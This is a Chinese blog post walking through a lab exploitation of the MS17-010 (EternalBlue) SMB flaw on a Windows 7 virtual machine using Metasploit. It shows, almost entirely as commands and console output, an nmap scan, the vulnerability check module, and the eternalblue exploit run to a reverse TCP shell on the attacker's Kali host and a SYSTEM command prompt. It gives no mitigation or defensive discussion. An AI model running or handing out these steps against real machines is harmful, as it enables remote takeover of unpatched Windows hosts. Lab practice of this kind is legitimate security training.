ms17-010漏洞利用MSF

最新推荐文章于 2024-05-13 01:52:00 发布

huihui_zyh

最新推荐文章于 2024-05-13 01:52:00 发布

阅读量667

点赞数

分类专栏： ms漏洞系列文章标签：安全漏洞

本文链接：https://blog.csdn.net/weixin_42373409/article/details/108512140

版权

ms漏洞系列专栏收录该内容

3 篇文章 0 订阅

订阅专栏

ms17-010漏洞利用

实验环境

1.kali linux（ip:192.168.131.131）
2.windows 7家庭版（ip:192.168.131.133、445端口开放）

扫描过程

1.利用nmap扫描目标主机的端口开放情况（发现目标主机开放了445端口）；

root@kali:~# nmap 192.168.131.133
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 13:22 CST
Nmap scan report for 192.168.131.133
Host is up (0.00027s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:0C:29:3B:F1:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds

2.打开msf；（命令：msfconsole）

root@kali:~# msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

3.搜索msf中关于ms17-010的内容；（命令：search ms17-010）

msf > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf >

4.先利用漏洞扫描的exp探测目标主机是否存在这个漏洞；（命令：use auxiliary/scanner/smb/smb_ms17_010）

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) >

5.查看exp需要哪些配置（命令：show optiions）

msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads
msf auxiliary(scanner/smb/smb_ms17_010) >

6.设置目标主机IP（命令：set rhosts 192.168.131.133）

msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.131.133
rhosts => 192.168.131.133
msf auxiliary(scanner/smb/smb_ms17_010) >

7.开始扫描（命令：exploit）

msf auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.131.133:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) >

发现是存在ms17-010漏洞的；

漏洞利用

1.打开msf；搜索ms17-010；

msf > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf >

2.我们利用exploit/windows/smb/ms17_010_eternalblue这个获取shell的exp模块（命令：use exploit/windows/smb/ms17_010_eternalblue）、查看需要的配置

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) >

3.设置目标主机（set rhost 192.168.131.133）

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.131.133
rhost => 192.168.131.133

4.开始攻击（命令：exploit）

msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.131.131:4444 
[*] 192.168.131.133:445 - Connecting to target for exploitation.
[+] 192.168.131.133:445 - Connection established for exploitation.
[+] 192.168.131.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.131.133:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.131.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.131.133:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.131.133:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.131.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.131.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.131.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.131.133:445 - Starting non-paged pool grooming
[+] 192.168.131.133:445 - Sending SMBv2 buffers
[+] 192.168.131.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.131.133:445 - Sending final SMBv2 buffers.
[*] 192.168.131.133:445 - Sending last fragment of exploit packet!
[*] 192.168.131.133:445 - Receiving response from exploit packet
[+] 192.168.131.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.131.133:445 - Sending egg to corrupted connection.
[*] 192.168.131.133:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.131.131:4444 -> 192.168.131.133:49162) at 2020-09-10 13:47:40 +0800
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.131.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

成功拿到shell；

huihui_zyh

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
ms17-010漏洞利用MSF

ms17-010漏洞利用## **实验环境**1.kali linux（ip:192.168.131.131）2.windows 7家庭版（ip:192.168.131.133、445端口开放）## **利用过程**1.利用nmap扫描目标主机的端口开放情况；
复制链接

扫一扫